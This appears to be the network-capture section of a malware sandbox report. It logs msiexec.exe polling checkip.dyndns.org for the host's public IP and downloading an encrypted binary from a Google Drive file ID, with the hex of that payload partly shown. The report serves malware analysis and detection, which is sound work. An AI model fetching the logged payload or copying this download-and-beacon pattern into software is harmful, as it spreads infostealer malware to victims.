Dec 23, 2024 21:50:51.875049114 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:50:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 23, 2024 21:50:51.878305912 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 23, 2024 21:50:52.359551907 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:50:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 23, 2024 21:50:54.474169970 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 23, 2024 21:50:57.960860968 CET	697	IN	HTTP/1.1 504 Gateway Time-out Date: Mon, 23 Dec 2024 20:50:57 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 23, 2024 21:50:57.985455990 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 23, 2024 21:51:01.469754934 CET	697	IN	HTTP/1.1 504 Gateway Time-out Date: Mon, 23 Dec 2024 20:51:01 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 23, 2024 21:51:01.472995043 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 23, 2024 21:51:01.944652081 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49809	132.226.8.169	80	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 21:51:03.740668058 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 23, 2024 21:51:05.133840084 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49817	132.226.8.169	80	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 21:51:06.936796904 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 23, 2024 21:51:09.439604998 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49829	132.226.8.169	80	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 21:51:11.504100084 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 23, 2024 21:51:15.906677961 CET	697	IN	HTTP/1.1 504 Gateway Time-out Date: Mon, 23 Dec 2024 20:51:15 GMT Content-Type: text/html Content-Length: 557 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED] Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49841	132.226.8.169	80	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 21:51:16.031003952 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 23, 2024 21:51:18.536293030 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49854	132.226.8.169	80	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 21:51:20.350445032 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 23, 2024 21:51:22.020172119 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 20:51:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49751	172.217.19.174	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:50:41 UTC	216	OUT	GET /uc?export=download&id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-23 20:50:42 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 23 Dec 2024 20:50:41 GMT Location: https://drive.usercontent.google.com/download?id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-1as3WxVHjdO7-zy-2R6dRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49758	142.250.181.1	443	5500	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 20:50:44 UTC	258	OUT	GET /download?id=1NFyMpD0jl3txuY6y7Z0yY0rsHp1RDSbb&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-23 20:50:47 UTC	4937	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC6b-eUTTDXBSNQf5-XbjXApfA5EKuQw25SCGpC54_9m3nuujsRj2NemuB1pwT0quIV4oktYkm4 Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="pApHCwM98.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 277056 Last-Modified: Mon, 23 Dec 2024 08:37:58 GMT Date: Mon, 23 Dec 2024 20:50:46 GMT Expires: Mon, 23 Dec 2024 20:50:46 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=lrT+DQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-23 20:50:47 UTC	4937	IN	Data Raw: 0c 20 17 5c f3 25 7a fd 77 77 bc 5d 4a 96 5b 33 ad 29 e5 f7 ef fc f3 c8 e3 85 dd 7f 37 85 e1 a2 fb 9a 5d de 3b c7 fe be 5d f7 f8 0a da 61 e0 0f 4e 84 e8 9a a4 72 3c 6d b4 fd b0 df a3 c1 b7 5c a1 fe 97 ce 49 3b 3b 91 a0 7b 06 77 bf a7 53 f4 d0 22 a6 0b 61 c8 f0 e8 40 18 6a 77 d3 a8 66 ab 0a f0 50 e4 c5 f6 86 9e 88 6f 21 93 23 95 c8 c2 ee 28 60 d2 0f 68 94 07 e0 54 3e 82 e4 1a 49 12 48 ad fa 3b 95 a1 5e 41 3f 27 b8 b7 02 fe a9 38 e5 a4 d2 a0 38 1f 06 32 a6 5b db 90 9f e1 d9 24 18 d2 08 54 80 a0 0f 7e 07 ef 56 03 e4 9b cc 8c 7e 44 2f 52 ac a7 c9 b2 2f 9f 64 f7 a4 4d e3 83 62 63 0a 87 a7 d1 9e 6d dd 65 d1 00 38 ce e8 ac 32 9a ea 46 69 3c 0a f9 bc 6b 62 03 93 6e bc 7d 97 1a da f8 e9 e0 9f 82 5c 6e a0 1f 9e e3 86 25 30 45 f3 2e 7c e2 06 6e a6 c3 ee 9c 85 47 2f Data Ascii: \%zww]J[3)7];]aNr<m\I;;{wS"a@jwfPo!#(`hT>IH;^A?'882[$T~V~D/R/dMbcme82Fi<kbn}\n%0E.\|nG/
2024-12-23 20:50:47 UTC	4821	IN	Data Raw: ea 41 82 62 07 a4 1f df 8f 86 25 32 25 f7 2e 26 e2 46 6e 91 e2 ee 9c 14 44 2f c3 19 dc b4 c5 20 ae 32 6e c1 0b 75 7b bb 8a 85 b1 b6 74 01 e8 d6 dd e9 5c 1f ec 29 87 e1 ba 18 cc 14 94 da 24 24 93 fe 9c e8 ed 9b b5 b0 24 99 e1 f3 f3 59 49 bd 62 30 31 f8 ab 5c 2f aa 94 5c 20 5f 4f 23 5a 96 59 4a 0e af 25 c4 b5 8d c5 c3 11 e4 bb 25 34 f1 6d 5d 9f c7 da 87 09 42 46 a9 c0 ee 4d 1c 81 b9 23 c1 b3 b6 33 eb ad 66 2a 39 3f b6 b4 5a 7b ec 27 29 8b 17 94 36 bc ab 2a bd f1 1f 1d 8d b9 e7 d1 23 e0 52 ce 2a 7b 72 cf db f6 9e a6 8e b9 b4 ea ea 60 54 33 49 82 e2 2c d6 f9 7c 99 2c 68 e8 1c 0b a1 cf 01 81 64 ee c6 b9 7b da 64 1b 93 89 c4 db 26 4a a1 a9 93 be 1e d4 14 cd e2 e6 33 21 d3 b5 c0 b6 79 d9 59 58 25 a0 8f 28 45 3c e8 73 2f 9c c3 35 d3 19 1e bb b1 ac 1b 34 ea d9 9c Data Ascii: Ab%2%.&FnD/ 2nu{t\)$$$YIb01\/\ _O#ZYJ%%4m]BFM#3f9?Z{')6#R*{r`T3I,\|,hd{d&J3!yYX%(E<s/54
2024-12-23 20:50:47 UTC	1325	IN	Data Raw: 5d 95 a2 be 5b d7 5b 63 86 eb fe c0 49 92 bc 22 86 b4 b6 33 eb 70 3f 2b 56 59 b6 b4 50 02 b1 40 29 8f 6f 6e 5c bc db 36 99 70 6c 74 87 af 13 c3 34 e6 52 cc 1b af 03 a5 db 88 bb b5 8b bd d7 9c 89 0b 24 25 6b 10 e4 3d da ed ed f4 3f 6f f3 1b ec 9f ce 10 87 48 f2 29 b9 29 db 64 1d ea 49 18 ca 28 0d 0d a9 93 be 13 79 d8 cd f3 e9 0c 21 d3 b8 d1 8d 79 d9 57 2b 3a 7e 81 22 3b fc c4 7b 34 98 bd 3c bc dc 14 bb 67 db 0e 5a ea dd f9 51 63 13 71 56 ba 4e 41 46 b7 09 54 cb b8 e8 e8 2c 61 6e a9 f0 c0 bd a1 64 57 1d d8 ff cb 2e 12 a0 78 62 a2 32 55 e2 64 0a 7c 2a 94 3a 98 30 c0 32 bd 1b b9 78 20 b8 6b fa 9e d6 5e 0f d6 91 ec f1 d8 cb d2 68 a7 b0 24 d8 3f 17 e7 00 0f a7 fd 1d 5f ce ab 35 d2 dc a6 f1 b6 49 4f f0 c9 4c 65 b9 c4 5d d7 08 15 2f 7e c2 09 85 6c 58 5c 84 50 12 Data Ascii: ][[cI"3p?+VYP@)on\6plt4R$%k=?oH))dI(y!yW+:~";{4<gZQcqVNAFT,andW.xb2Ud\|*:02x k^h$?_5IOLe]/~lX\P
2024-12-23 20:50:47 UTC	1390	IN	Data Raw: 88 33 df a7 21 7e e3 0c e2 f5 ab 53 c1 b9 f1 95 83 88 29 58 17 c7 9a ee 39 30 14 69 6a b5 1d 30 fa 16 6c 56 3c 96 d5 b2 29 ce a8 98 0c 95 6e 05 a2 13 d3 b4 ce 5c ca fc 8a e2 79 fd d2 a8 f2 82 ac 52 e3 15 0d e5 29 28 d2 8d bf 70 ba 89 1f d2 d6 b1 72 88 d8 7d 69 c6 4d 30 0d 9e db c5 08 6f e2 93 d5 21 3b 6c 26 6a 26 75 0e 30 1f 70 62 1f 56 af 1a 00 02 5f 89 db 96 0e 2a d2 a9 59 d2 d1 a6 8e 80 03 ed 54 1d 8b ac 44 ee 5f a2 89 77 26 1c a4 e4 e5 c6 fb 4a 4e 4c f0 b3 ba 81 51 9b 54 0d f6 32 7d b4 65 5a 7d b0 27 7b aa e6 e8 3d 36 10 8c cb 6b 13 d1 76 cb 9a 8c ce 72 86 ea 4d 76 63 b1 3e 82 df ea ef 6f 8c a5 8f ea a8 2f 2d b5 6a ae 0a e1 5c 6a ff e5 d4 3e aa 6c 76 7f 49 ee e4 b2 11 d7 59 b9 ad da 69 9b 5d 6f c1 f0 e3 e6 08 91 04 98 c0 89 56 6c 71 fa 34 39 47 d2 70 Data Ascii: 3!~S)X90ij0lV<)n\yR)(pr}iM0o!;l&j&u0pbV_*YTD_w&JNLQT2}eZ}'{=6kvrMvc>o/-j\j>lvIYi]oVlq49Gp
2024-12-23 20:50:47 UTC	1390	IN	Data Raw: 0d f0 e1 d6 09 8d 75 78 51 61 6f e0 10 3e db d5 45 ae fe 08 1d 59 46 dc 7d a9 89 c0 90 21 84 b2 ba 72 6c 01 5c 62 c3 6f 66 7a 60 64 d4 ee ca 3a aa 81 d2 12 a2 4f a8 f4 6f c3 d4 9b e4 7e 50 3e cf ec f0 0e 7f 7d 9b 39 db 83 fb 4f a2 f2 ad 3c 46 eb a8 ac 47 ca e6 1b 54 24 f1 bd 2d 4e de c3 9e f0 8a 89 24 64 81 1b 23 c0 22 05 e9 18 60 82 23 be 1a 1e 2b a2 d7 5d 3b 13 27 96 e1 05 50 c4 aa 14 30 d9 2f 2f 16 1a b2 74 62 fb 56 3e 96 4b b4 b4 d2 e1 5a db 0a b2 18 08 5b 38 ca df 71 a8 4e c6 22 89 aa ee b7 c1 f7 1a 5f c9 7a a1 90 59 03 3e 6d d6 d4 4b 98 ea b3 fc 42 32 ac 8a 0f d0 16 6a 6b fe f2 98 af 47 db d6 3f 70 39 57 70 29 57 19 b4 8c b2 70 da 95 af b6 c7 9c d1 73 89 f4 49 31 68 98 e5 e3 fc 74 b8 be 01 e7 9b ae e4 63 ca aa 43 bd 5d 13 2a 73 e8 71 39 6c 14 7d 03 Data Ascii: uxQao>EYF}!rl\bofz`d:Oo~P>}9O<FGT$-N$d#"`#+];'P0//tbV>KZ[8qN"_zY>mKB2jkG?p9Wp)WpsI1htcC]*sq9l}
2024-12-23 20:50:47 UTC	1390	IN	Data Raw: 70 6e 84 87 37 e7 9c db 74 77 8b 46 3a 79 97 b3 c6 fd 74 b2 b2 70 e6 9b da da a0 4b aa 49 a4 47 93 1f 79 ee 4c e9 5a 05 7d 0d eb c0 83 88 99 3a 37 85 f4 26 37 f9 d5 35 36 b7 c9 b9 0a 85 49 cb f6 a4 91 1d 3b 58 b8 b7 20 57 ce 70 3f 99 32 5a 00 b7 d6 fa 5a ab ec 69 8b a0 76 d4 d2 e7 b0 87 94 e7 da db f4 d0 34 83 5c 71 a1 7b 3f 61 14 23 2f ee a7 f5 1a 6a bd 3b 11 f3 c1 9a 46 7f 00 b2 fd 90 35 6d 75 f3 5a d0 7b 34 14 49 69 ac 88 c3 da 15 27 0f 61 b1 fb 6c c3 2a 1a d7 42 83 4a 81 95 7d 01 f7 c2 12 64 e4 ce 90 dd 32 18 d5 b4 58 70 13 81 61 34 24 f9 da 36 27 bb bf b3 cc 10 c2 29 13 0b 34 5b 21 ff ce ce f5 8d 51 8e 95 f7 ce 6e fd 4c 88 47 34 c7 b5 d1 d6 16 1a 68 7b 35 e6 cd 99 85 4b 82 39 a3 84 5c 81 bc 4d 0d 91 ea 5f a5 ca 57 6f bd f7 76 e5 cc 6c ad e3 ac ae 08 Data Ascii: pn7twF:ytpKIGyLZ}:7&756I;X Wp?2ZZiv4\q{?a#/j;F5muZ{4Ii'al*BJ}d2Xpa4$6')4[!QnLG4h{5K9\M_Wovl
